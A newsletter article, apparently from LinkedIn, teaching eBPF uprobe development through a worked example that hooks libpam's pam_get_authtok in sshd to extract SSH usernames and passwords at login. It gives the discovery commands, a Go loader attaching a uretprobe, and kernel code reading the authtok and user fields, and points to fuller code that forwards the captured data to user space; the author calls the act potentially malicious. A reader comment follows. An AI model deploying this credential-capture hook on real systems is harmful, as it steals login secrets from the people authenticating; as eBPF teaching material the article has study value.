Challenges and Strategies in eBPF Uprobe Development

Challenges and Strategies in eBPF Uprobe Development

When it comes to eBPF development, the hardest part is moving forward from the code examples and tutorials you find on the web and designing something on your own.

In this newsletter, I want to help you up your game and become a well-rounded eBPF developer.

Today’s topic is uprobes (user space probes).

The focus will not be on understanding the code but rather on where and how to discover and attach uprobes in the application stack, which is tricky — believe me.

Let me show you.


Consider that we want to extract SSH usernames and passwords on each user login. This is potentially a malicious act but a good exercise for this demonstration.

In the SSH daemon, a.k.a. sshd, Linux PAM (Pluggable Authentication Modules) is a suite of libraries that enable user authentication, so this should be our starting point.

We start by looking through its source code on GitHub as we're interested in finding a hook point or, I should say, a function that either handles the authentication or has access to the authentication parameters so we can extract them.

Traversing through the code and searching for specific symbols, one can find a pam_get_authtok function. This should trigger some interest.

We look further and find that the first argument of the function is a pam_handle_t struct that holds the user (username) and the authtok (password) parameters.

At this stage, we can only technically speculate that this function is triggered on user login, or we can spend a bit more time in the source code.

We can verify this function is utilized by our sshd by exporting the libraries it utilizes and searching for the function symbol. We achieve that by first figuring out the sshd PID (Process ID):

ps faux | grep sshd        
Article content

Using this information, we can list the symbol table of the library using the following command:

sudo readelf -s --wide /proc/<PID>/root/usr/lib/x86_64-linux-gnu/libpam.so.0 | grep pam_get_authtok        
💡 Note: You need to replace the <PID> placeholder with the sshd PID. (second column of ps faux command output - in our case 597234)

We can see that the library does indeed have the pam_get_authtok function symbol. This is great so far — let's try to hook onto it.

Just for the sake of it, first, we will print some dummy data to check if the function is actually triggered.

Here's a MVP with a Kernel space program:

//go:build ignore
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

char __license[] SEC("license") = "GPL";

SEC("uretprobe/pam_get_authtok")
int trace_pam_get_authtok(struct pt_regs *ctx) {
    bpf_printk("It's triggered - jeii!");
    return 0;
};        
💡 Note: A uretprobe is a probe that is triggered on the exit of a function, rather than on the entry of it like a uprobe.

And a User Space program:

package main

//go:generate go run github.com/cilium/ebpf/cmd/bpf2go -target amd64 guard guard.c

import (
        "log"
        "fmt"
        "time"
        "os/exec"
	"strings"
	"bufio"
	"bytes"
	"github.com/cilium/ebpf/link"
	"github.com/cilium/ebpf/rlimit"
)

const (
	defaultBinPath = "libpam.so.0"
	defaultSymbol  = "pam_get_authtok"
)

func findLibraryPath(libname string) (string, error) {
        cmd := exec.Command("sh", "-c", fmt.Sprintf("ldconfig -p | grep %s", libname))
	// Run the command and get the output
	var out bytes.Buffer
	cmd.Stdout = &out
	err := cmd.Run()
	if err != nil {
		return "", fmt.Errorf("failed to run ldconfig: %w", err)
	}

	// Read the first line of output which should have the library path
	scanner := bufio.NewScanner(&out)
	if scanner.Scan() {
		line := scanner.Text()
		// Extract the path from the ldconfig output
		if start := strings.LastIndex(line, ">"); start != -1 {
			path := strings.TrimSpace(line[start+1:])
			return path, nil
		}
	}
	return "", fmt.Errorf("library not found")
}

func main() {
	// Allow the current process to lock memory for eBPF resources.
	if err := rlimit.RemoveMemlock(); err != nil {
		log.Fatal(err)
	}
	// Load pre-compiled programs and maps into the kernel.
	objs := guardObjects{}
	if err := loadGuardObjects(&objs, nil); err != nil {
		log.Fatalf("loading objects: %s", err)
	}
	defer objs.Close()
	pamPath, err := findLibraryPath(defaultBinPath);
	if err != nil {
		log.Fatal(err)
	}
	log.Printf("LibPAM path: %s\n", defaultBinPath);
	// Open an ELF binary and read its symbols.
	ex, err := link.OpenExecutable(pamPath)
	if err != nil {
		log.Fatalf("opening executable: %s", err)
	}
	// Set up uretprobes
	uretprobe_pam, err := ex.Uretprobe(defaultSymbol, objs.TracePamGetAuthtok, nil)
	if err != nil {
		log.Fatalf("creating uretprobe - %s: %s", defaultSymbol, err)
	}
	defer uretprobe_pam.Close()
	for {
		time.Sleep(1 * time.Second)
	}
}        

So the kernel program will just print something, but the slightly trickier part is attaching the uretprobe to the libpam binary. We first need to find the path to the library itself and utilize eBPF Link to attach our program to it.

By running this program, we can see that our program was indeed triggered by printing eBPF traces:

 sudo bpftool prog trace        
Article content

This is good — we are on the right path. Now it's just a matter of checking which parameters we need to read from the registers to get the username and password parameters, which we already discussed before.

In the pam_get_authtok function, we need to read the pam_handle_t struct, which we can copy and paste from the source into our code and utilize the bpf_probe_read helper function to extract the parameters, namely authtok and user. In other words, modifying our kernel code as:

//go:build ignore
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

char __license[] SEC("license") = "GPL";

SEC("uretprobe/pam_get_authtok")
int trace_pam_get_authtok(struct pt_regs *ctx) {
    bpf_printk("It's triggered - jeii!");

    if (!PT_REGS_PARM1(ctx)) {
         return 0;
    }

    pam_handle_t* phandle = (pam_handle_t*)PT_REGS_PARM1(ctx);
    u32 pid = bpf_get_current_pid_tgid() >> 32;

    u64 password_addr = 0;
    bpf_probe_read(&password_addr, sizeof(password_addr), &phandle->authtok);

    u64 username_addr = 0;
    bpf_probe_read(&username_addr, sizeof(username_addr), &phandle->user);

    return 0;
};        

This way, we finished the extraction of the variables and technically got what we wanted.

💡 Note: This example only covers username and password authentication, but we could technically expand this to also cover authentication using SSH public and private keys.

To wrap this up, in the final code, I’ve also added the eBPF Ring Buffer Map to forward the extracted data to user space. You can find the complete code on my GitHub.


We have come to the end of this week's newsletter, and to be honest, the hardest part in developing uprobe eBPF programs is finding the right hook points and understanding the library source code. Additionally, it’s important to verify using ps and readelf that our applications are actually utilizing the function we plan to track. However, if you're searching for a hook point inside your application or library, this would be more straightforward.

I hope you find this resource as enlightening as I did. Stay tuned for more exciting developments and updates in the world of eBPF in next week's newsletter.

Until then, keep 🐝-ing!

Warm regards, Teodor

Jameel Kaisar

SDE @Amazon | Ex BrowserStack, Zeta, Wikipedia, BARC | Open Source Contributor

11mo

Very tricky indeed! Identifying the right function and structs requires a deep dive into the codebase. eBPF uprobes can be quite challenging, especially when some function parameters are passed via stack rather than the registers.

To view or add a comment, sign in

Others also viewed

Explore topics